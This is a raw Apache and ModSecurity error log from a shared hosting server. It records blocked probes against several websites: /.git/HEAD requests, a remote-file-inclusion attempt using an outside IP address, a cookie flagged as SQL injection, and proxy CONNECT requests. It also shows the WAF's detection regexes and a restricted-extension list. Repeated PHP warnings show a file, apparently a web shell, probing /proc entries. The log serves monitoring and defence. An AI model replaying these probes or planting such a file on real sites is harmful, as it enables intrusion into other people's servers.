[Tue May 12 06:30:46.054536 2026] [authz_core:error] [pid 1844863:tid 1844893] [client 194.163.140.214:52353] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-content/uploads/wpcf7_uploads/, referer: binance.com
[Tue May 12 06:31:02.509758 2026] [security2:error] [pid 1825179:tid 1825200] [client 124.156.226.179:52686] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pweil.com"] [uri "/"] [unique_id "agKtBtr1yOh9TvizezixdQAAAEI"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705480/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705480/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705480/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705480/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705480/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705480/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:32:27.048201 2026] [security2:error] [pid 1808852:tid 1808856] [client 43.134.188.114:51174] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pieces/six-miniatures-pour-sextuor/"] [unique_id "agKtWxfeipD4uoG21FpFRAAAAAE"]
[Tue May 12 06:33:31.904710 2026] [security2:error] [pid 1825179:tid 1825209] [client 43.159.132.207:56840] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.com"] [uri "/"] [unique_id "agKtm9r1yOh9TvizeziyCgAAAEs"]
[Tue May 12 06:33:45.579906 2026] [security2:error] [pid 1844863:tid 1844886] [client 49.51.233.46:55626] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agKtqfaAnTZtx1_H_wzLbwAAAVE"]
[Tue May 12 06:33:59.570037 2026] [security2:error] [pid 1808852:tid 1808863] [client 44.205.120.22:25960] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freelivepornshows.com"] [unique_id "agKttxfeipD4uoG21FpFnQAAAAg"]
[Tue May 12 06:33:59.570392 2026] [security2:error] [pid 1808852:tid 1808863] [client 44.205.120.22:25960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freelivepornshows.com"] [unique_id "agKttxfeipD4uoG21FpFnQAAAAg"]
[Tue May 12 06:33:59.570629 2026] [security2:error] [pid 1808852:tid 1808863] [client 44.205.120.22:25960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freelivepornshows.com"] [unique_id "agKttxfeipD4uoG21FpFnQAAAAg"]
[Tue May 12 06:34:17.546129 2026] [authz_core:error] [pid 1808852:tid 1808878] [client 194.163.140.214:65260] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-admin/includes/error_log, referer: binance.com
[Tue May 12 06:34:44.053246 2026] [authz_core:error] [pid 1808852:tid 1808869] [client 194.163.140.214:57617] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-admin/includes/error_log, referer: binance.com
[Tue May 12 06:36:10.279815 2026] [security2:error] [pid 1825179:tid 1825200] [client 45.130.203.180:37547] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agKuOtr1yOh9TvizezizXgAAAEI"]
[Tue May 12 06:36:10.280039 2026] [security2:error] [pid 1825179:tid 1825200] [client 45.130.203.180:37547] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agKuOtr1yOh9TvizezizXgAAAEI"]
[Tue May 12 06:36:10.280284 2026] [security2:error] [pid 1825179:tid 1825200] [client 45.130.203.180:37547] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agKuOtr1yOh9TvizezizXgAAAEI"]
[Tue May 12 06:36:11.146729 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.130.203.189:64161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agKuOxs7kySIUZ3ORnI60wAAAQA"]
[Tue May 12 06:36:11.146958 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.130.203.189:64161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agKuOxs7kySIUZ3ORnI60wAAAQA"]
[Tue May 12 06:36:11.147173 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.130.203.189:64161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agKuOxs7kySIUZ3ORnI60wAAAQA"]
[Tue May 12 06:36:26.542967 2026] [security2:error] [pid 1825179:tid 1825209] [client 89.187.168.211:59592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: 421ecf4d443dde8f15adec5ec9ccb05b||1778562385||1778562025"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuStr1yOh9TvizezizegAAAEs"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:26.543238 2026] [security2:error] [pid 1825179:tid 1825209] [client 89.187.168.211:59592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuStr1yOh9TvizezizegAAAEs"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:26.543462 2026] [security2:error] [pid 1825179:tid 1825209] [client 89.187.168.211:59592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuStr1yOh9TvizezizegAAAEs"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:26.829864 2026] [security2:error] [pid 1844863:tid 1844870] [client 89.187.168.211:59602] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: 421ecf4d443dde8f15adec5ec9ccb05b||1778562385||1778562025"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuSvaAnTZtx1_H_wzMGgAAAUE"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:26.830097 2026] [security2:error] [pid 1844863:tid 1844870] [client 89.187.168.211:59602] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuSvaAnTZtx1_H_wzMGgAAAUE"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:26.830321 2026] [security2:error] [pid 1844863:tid 1844870] [client 89.187.168.211:59602] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuSvaAnTZtx1_H_wzMGgAAAUE"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:27.112800 2026] [security2:error] [pid 1842385:tid 1842400] [client 89.187.168.211:59612] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: 421ecf4d443dde8f15adec5ec9ccb05b||1778562385||1778562025"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuSxs7kySIUZ3ORnI64AAAAQo"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:27.113097 2026] [security2:error] [pid 1842385:tid 1842400] [client 89.187.168.211:59612] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuSxs7kySIUZ3ORnI64AAAAQo"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:27.113330 2026] [security2:error] [pid 1842385:tid 1842400] [client 89.187.168.211:59612] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuSxs7kySIUZ3ORnI64AAAAQo"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:27.369663 2026] [security2:error] [pid 1820198:tid 1820209] [client 89.187.168.211:59620] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: 421ecf4d443dde8f15adec5ec9ccb05b||1778562385||1778562025"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuS81tk6y7yBJLpJpKbAAAAIk"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:27.369876 2026] [security2:error] [pid 1820198:tid 1820209] [client 89.187.168.211:59620] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuS81tk6y7yBJLpJpKbAAAAIk"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:27.370102 2026] [security2:error] [pid 1820198:tid 1820209] [client 89.187.168.211:59620] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKuS81tk6y7yBJLpJpKbAAAAIk"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:36:30.286582 2026] [security2:error] [pid 1844863:tid 1844875] [client 34.206.212.24:56223] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://192.46.231.91 found within ARGS:url: https://192.46.231.91/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKuTvaAnTZtx1_H_wzMHgAAAUY"]
[Tue May 12 06:36:30.287070 2026] [security2:error] [pid 1844863:tid 1844875] [client 34.206.212.24:56223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKuTvaAnTZtx1_H_wzMHgAAAUY"]
[Tue May 12 06:36:30.287305 2026] [security2:error] [pid 1844863:tid 1844875] [client 34.206.212.24:56223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKuTvaAnTZtx1_H_wzMHgAAAUY"]
[Tue May 12 06:37:05.088343 2026] [security2:error] [pid 1808852:tid 1808870] [client 93.123.109.62:39146] ModSecurity: Warning. Match of "rx ^(?i:(?:[a-z]{3,10}\\\\s+(?:\\\\w{3,7}?://[\\\\w\\\\-\\\\./]*(?::\\\\d+)?)?/[^?#]*(?:\\\\?[^#\\\\s]*)?(?:#[\\\\S]*)?|connect (?:\\\\d{1,3}\\\\.){3}\\\\d{1,3}\\\\.?(?::\\\\d+)?|options \\\\*)\\\\s+[\\\\w\\\\./]+|get /[^?#]*(?:\\\\?[^#\\\\s]*)?(?:#[\\\\S]*)?)$" against "REQUEST_LINE" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "47"] [id "920100"] [rev "2"] [msg "Invalid HTTP Request Line"] [data "CONNECT ip.ninonakano.jp:443 HTTP/1.1"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "ip.ninonakano.jp"] [uri "/"] [unique_id "agKucRfeipD4uoG21FpGKwAAAA8"]
[Tue May 12 06:37:05.089877 2026] [:error] [pid 1808852:tid 1808870] [client 93.123.109.62:39146] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:37:08.627975 2026] [core:error] [pid 1825179:tid 1825206] [client 172.212.136.43:24773] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:08.628010 2026] [core:error] [pid 1825179:tid 1825206] [client 172.212.136.43:24773] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:09.321985 2026] [core:error] [pid 1820198:tid 1820214] [client 172.212.136.43:3676] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:09.322023 2026] [core:error] [pid 1820198:tid 1820214] [client 172.212.136.43:3676] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:10.556669 2026] [core:error] [pid 1825287:tid 1825308] [client 172.212.136.43:42025] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:10.556704 2026] [core:error] [pid 1825287:tid 1825308] [client 172.212.136.43:42025] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:11.409162 2026] [core:error] [pid 1820198:tid 1820210] [client 172.212.136.43:3705] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:11.409195 2026] [core:error] [pid 1820198:tid 1820210] [client 172.212.136.43:3705] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:11.908409 2026] [core:error] [pid 1842385:tid 1842410] [client 172.212.136.43:24779] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:11.908448 2026] [core:error] [pid 1842385:tid 1842410] [client 172.212.136.43:24779] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:12.891832 2026] [core:error] [pid 1825179:tid 1825202] [client 172.212.136.43:24799] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:12.891862 2026] [core:error] [pid 1825179:tid 1825202] [client 172.212.136.43:24799] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:14.117317 2026] [core:error] [pid 1820198:tid 1820212] [client 172.212.136.43:8327] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:37:14.117356 2026] [core:error] [pid 1820198:tid 1820212] [client 172.212.136.43:8327] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
